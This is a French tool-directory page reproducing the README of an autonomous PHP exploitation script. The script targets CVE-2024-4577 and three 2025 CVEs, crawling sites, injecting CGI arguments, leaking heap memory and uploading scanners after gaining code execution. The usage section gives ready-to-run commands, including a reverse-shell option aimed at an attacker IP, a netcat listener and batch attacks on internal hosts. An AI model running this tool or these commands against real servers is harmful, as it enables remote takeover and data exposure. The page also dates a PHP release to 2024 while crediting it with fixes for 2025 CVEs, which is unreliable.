Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PHP_8.1.x_Exploit — Détection automatisée & exploitation de vulnérabilités PHP critiques (CVE-2024-4577 contournement, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Outils/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleCrawlerOutil d'Accès à Distance
GitHub
114il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
gl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

Détection automatisée & exploitation de vulnérabilités PHP critiques (CVE-2024-4577 contournement, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Voir le dépôt
Partager

🚀 PHP CVE Autopilot

Détection et exploitation automatisées des vulnérabilités PHP critiques (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh est un outil d'évaluation de sécurité monofichier, sans configuration, qui découvre automatiquement les points de terminaison PHP vulnérables et exploite quatre CVE à fort impact affectant les versions de PHP antérieures à 8.1.34 (publié en décembre 2024). Il ne nécessite aucune conception manuelle de charge utile – fournissez simplement une URL et le script fait le reste, du crawling à l'exécution de code à distance. Entièrement autopilote – détecte et exploite automatiquement sans intervention de l'utilisateur.

Fonctionnalités

  • Autopilote entièrement autonome – à partir d'une seule URL, il crawl, identifie, teste et exploite sans interaction utilisateur.
  • Analyse par lots – fournissez une liste de cibles et exécutez en parallèle.
  • Crawling avancé – extrait les liens et les formulaires de la page d'accueil pour une meilleure découverte.
  • Identification de l'OS et de la version PHP – évite les attaques Windows uniquement sur Linux, vérifie la version PHP.
  • Contournement CVE-2024-4577 (injection d'arguments CGI Windows)
    • Détecte et exploite les points de terminaison PHP-CGI vulnérables.
    • Option reverse shell (one-liner PowerShell).
    • Deux variantes d'injection : standard -d et contournement par trait d'union doux %AD.
  • CVE-2025-14177 – fuite de mémoire tas via getimagesize()
    • Crée dynamiquement un JPEG malformé et le soumet automatiquement à tout point de terminaison de téléchargement découvert.
    • Détecte la mémoire divulguée dans les réponses.
  • Analyse locale approfondie via RCE (lorsque CVE-2024-4577 est exploitée)
    • Télécharge un scanner PHP léger qui teste :
      • CVE-2025-14180 – déréférencement de pointeur NULL dans PDO PostgreSQL.
      • CVE-2025-14178 – débordement d'entier dans array_merge.
  • Crawling intelligent – extrait les liens et les formulaires pour découvrir les scripts CGI et les pages de téléchargement.
  • Exécution parallèle – utilise parallel si disponible, sinon bascule gracieusement.
  • Modes verbeux et débogage – voyez chaque requête HTTP et chaque décision.
  • Génération de rapport – enregistre tous les résultats dans un fichier texte.
  • Propre et sûr – les fichiers temporaires sont détruits à la sortie, les timeouts empêchent le blocage.

Prérequis

DépendanceObjectifGénéralement installé ?
bash 4.0+Interpréteur de scriptOui (Linux/macOS)
curlRequêtes HTTPOui
grep, sed, awkTraitement de texteOui
mktempCréation de fichier temporaireOui
(optionnel) parallelAnalyse par lots plus rapideNon (mais recommandé)
(optionnel) jqFormatage de sortie JSONNon

Aucun privilège root requis – l'outil envoie uniquement des requêtes HTTP et exécute éventuellement un reverse shell (nécessite un écouteur sur votre machine).

Installation

git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

Utilisation

Cible unique (cas le plus courant)

./PHP8.1.x_Exploit.sh -u http://cible.example.com

Cible unique avec reverse shell (CVE-2024-4577)

./PHP8.1.x_Exploit.sh -u http://serveur-windows-vulnerable.local/ --revshell 192.168.1.100 4444

Puis sur votre machine :

nc -lvnp 4444

Analyse par lots de plusieurs cibles

./PHP8.1.x_Exploit.sh -l cibles.txt --threads 10

Exemple cibles.txt :

http://192.168.1.1/
https://10.0.0.5:8080/
http://app-interne.entreprise.com

Mode analyse uniquement (pas de tentative d'exploitation)

./PHP8.1.x_Exploit.sh -u http://cible.com/ --scan-only

Enregistrer le rapport dans un fichier

./PHP8.1.x_Exploit.sh -u http://cible.com/ -o resultats.txt

Sortie verbeuse / débogage

./PHP8.1.x_Exploit.sh -u http://cible.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://cible.com/ --debug   # très bavard

Comment ça fonctionne (phases)

PhaseAction
1Identification – OS et version PHP à partir des en-têtes et sondes.
2Crawling – extrait les attributs href et action de la page d'accueil.
3Découverte CGI – essaie les chemins courants et les liens crawlés qui ressemblent à du CGI.
4Test CVE‑2024‑4577 – injecte les charges utiles -d et %AD ; en cas de succès, exécute des commandes ou envoie un reverse shell.
5Découverte de point de terminaison de téléchargement – vérifie les chemins de téléchargement courants et tout formulaire contenant "upload"/"image".
6Test CVE‑2025‑14177 – crée un JPEG malformé, le POST sur chaque point de terminaison de téléchargement, détecte les fuites tas.
7Analyse interne approfondie – si une RCE est obtenue, télécharge un script PHP scanner et l'exécute pour tester CVE‑2025‑14180 / CVE‑2025‑14178.
8Rapport – affiche un résumé et écrit éventuellement dans un fichier.

Options de ligne de commande (référence complète)

OptionDescription
-u URLURL de la cible unique (ex. http://example.com/)
-l FICHIERFichier par lots avec une URL par ligne
--scan-onlyDétecter uniquement – ne pas exploiter (pas de reverse shell, pas de téléchargement de charge utile)
-o FICHIERÉcrire le rapport final dans FICHIER
--threads NNombre de threads parallèles pour l'analyse par lots (défaut : 5)
--timeout NTimeout HTTP en secondes (défaut : 10)
--no-colorDésactiver la sortie colorée
--verboseAfficher la progression détaillée
--debugAfficher chaque requête HTTP (peut exposer des données sensibles)
--revshell IP PORTTenter un reverse shell lorsque CVE‑2024‑4577 est trouvée
-h, --helpAfficher l'aide et quitter

CVE couvertes en détail

CVESévéritéImpactVecteur d'exploitationCorrigé dans
CVE‑2024‑4577 (bypass)CritiqueRCEInjection d'arguments CGI Windows (mappage trait d'union doux)PHP 8.1.34
CVE‑2025‑14177Moyen/ÉlevéFuite d'informations (mémoire tas)JPEG malformé passé à getimagesize()PHP 8.1.34
CVE‑2025‑14180ÉlevéDoS (déréférencement NULL)PDO PostgreSQL avec prepares émulés + paramètre malformé \x99PHP 8.1.34
CVE‑2025‑14178Élevé (8.2)DoS / corruption mémoire potentiellearray_merge() avec de grands tableaux provoquant un débordement d'entierPHP 8.1.34

Remarque : CVE‑2025‑14180 et CVE‑2025‑14178 ne peuvent être détectées avec précision que depuis l'intérieur du serveur (tests locaux). Le script y parvient en téléchargeant un scanner après une exploitation CGI réussie.

📸 Exemple de sortie

[*] Scan de : http://192.168.1.100/
[*] OS : windows
[*] Version PHP : 8.1.33
[*] Test de CVE-2024-4577 sur http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577 : VULNÉRABLE (injection par trait d'union doux)
[*] Tentative de reverse shell vers 192.168.1.5 4444
...
[*] Test de CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177 : Fuite tas potentielle détectée !
...
[*] Exécution d'un scan local approfondi via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180 : VULNÉRABLE
CVE-2025-14178 : VULNÉRABLE
CVE-2025-14177 : VULNÉRABLE (fuite : 486561704c65616b21...)
Télécharger l’outil